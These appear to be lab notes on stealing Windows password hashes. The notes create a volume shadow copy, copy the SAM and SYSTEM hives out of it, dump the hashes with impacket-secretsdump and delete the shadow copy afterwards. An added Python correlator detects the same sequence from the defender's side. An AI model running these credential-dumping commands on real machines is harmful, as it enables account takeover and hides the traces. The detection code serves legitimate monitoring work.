Shadow Copy

With elevated privileges, create a shadow copy of the C: volume through WMI:

C:\>wmic shadowcopy call create Volume='C:\'
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{454E3F18-B0D8-4C7B-891D-439E9F773ADF}";
};

List the existing shadow copies with vssadmin list shadows:

C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {869a05c9-8b82-48dd-845a-d3f952550802}
   Contained 1 shadow copies at creation time: 4/2/2024 2:42:56 PM
      Shadow Copy ID: {454e3f18-b0d8-4c7b-891d-439e9f773adf}
         Original Volume: (C:)\\?\Volume{7daad430-ba07-41f6-9abe-8ce956f64e22}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: WST2.vulnableone.local
         Service Machine: WST2.vulnableone.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential

Copying the SAM and SYSTEM hives out of the shadow copy (the live hives are locked, so they are read through the shadow copy device path instead):

C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM C:\Users\sieng.chantrea\Desktop\SAM
        1 file(s) copied.
        
C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\Users\sieng.chantrea\Desktop\SYSTEM
        1 file(s) copied.

Dumping the hashes from the copied hives with impacket-secretsdump, offline on the Linux host:

└─$ impacket-secretsdump -sam sam -system system local

Deleting the shadow copy by its ID and confirming that it is gone:

C:\>vssadmin Delete Shadows /Shadow={454e3f18-b0d8-4c7b-891d-439e9f773adf}
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Do you really want to delete 1 shadow copies (Y/N): [N]? Y

Successfully deleted 1 shadow copies.

C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

No items found that satisfy the query.
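Added example, not part of the original notes: a small Python correlator written from the defender's side that flags the create / read-hive-from-shadow / delete sequence above in process-creation telemetry (Security 4688 with command-line auditing, or Sysmon event 1). The sample records are constructed to mirror the session above; the host names, user and field layout are assumptions. Note that copy is a cmd.exe builtin, so it only shows up as a command line when run through cmd /c; an interactive copy leaves no process-creation record and needs file-create telemetry (for example Sysmon event 11 on the written hive) instead.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# One regex per stage of the technique. The hive stage keys on the
# \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path: reading SAM/SYSTEM/SECURITY
# through it has no routine administrative use, unlike creating or deleting shadows.
STAGES = {
    "shadow_create": re.compile(r"wmic\s+shadowcopy\s+call\s+create|vssadmin\s+create\s+shadow", re.I),
    "hive_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\(SAM|SYSTEM|SECURITY)\b", re.I),
    "shadow_delete": re.compile(r"vssadmin\s+delete\s+shadows", re.I),
}

@dataclass
class ProcEvent:          # assumed normalised shape of a 4688 / Sysmon 1 record
    ts: datetime          # event time
    host: str             # Computer
    user: str             # SubjectUserName / User
    cmdline: str          # CommandLine (requires command-line auditing or Sysmon)

def classify(cmdline: str) -> list[str]:
    """Return the technique stages a single command line matches (usually 0 or 1)."""
    return [name for name, rx in STAGES.items() if rx.search(cmdline)]

def correlate(events: list[ProcEvent], window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """Alert per host when a hive is read through a shadow device; escalate to critical
    when the same host also created and deleted shadows within `window` of that read."""
    hits: dict[str, list[tuple[datetime, str, str]]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        for stage in classify(ev.cmdline):
            hits.setdefault(ev.host, []).append((ev.ts, stage, ev.user))
    alerts = []
    for host, seq in hits.items():
        reads = [t for t, s, _ in seq if s == "hive_from_shadow"]
        if not reads:
            continue  # create/delete alone is what backup jobs and cleanup look like
        near = {s for t, s, _ in seq if abs(t - reads[0]) <= window}
        severity = "critical" if near == set(STAGES) else "high"
        alerts.append({"host": host, "user": seq[0][2], "stages": sorted(near), "severity": severity})
    return alerts

# Constructed sample records mirroring the session above (host names are placeholders).
T = datetime(2024, 4, 2, 14, 42, 56)
SAMPLE = [
    ProcEvent(T, "WST2", "sieng.chantrea", r"wmic shadowcopy call create Volume='C:\'"),
    ProcEvent(T + timedelta(minutes=2), "WST2", "sieng.chantrea", r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM C:\Users\sieng.chantrea\Desktop\SAM"),
    ProcEvent(T + timedelta(minutes=2, seconds=30), "WST2", "sieng.chantrea", r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\Users\sieng.chantrea\Desktop\SYSTEM"),
    ProcEvent(T + timedelta(minutes=9), "WST2", "sieng.chantrea", "vssadmin Delete Shadows /Shadow={454e3f18-b0d8-4c7b-891d-439e9f773adf}"),
    ProcEvent(T, "FS1", "backupsvc", "vssadmin create shadow /for=C:"),  # routine backup job, no alert
]
```

Running correlate(SAMPLE) yields one critical alert for WST2 and nothing for FS1, since a shadow creation on its own is normal backup behaviour.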
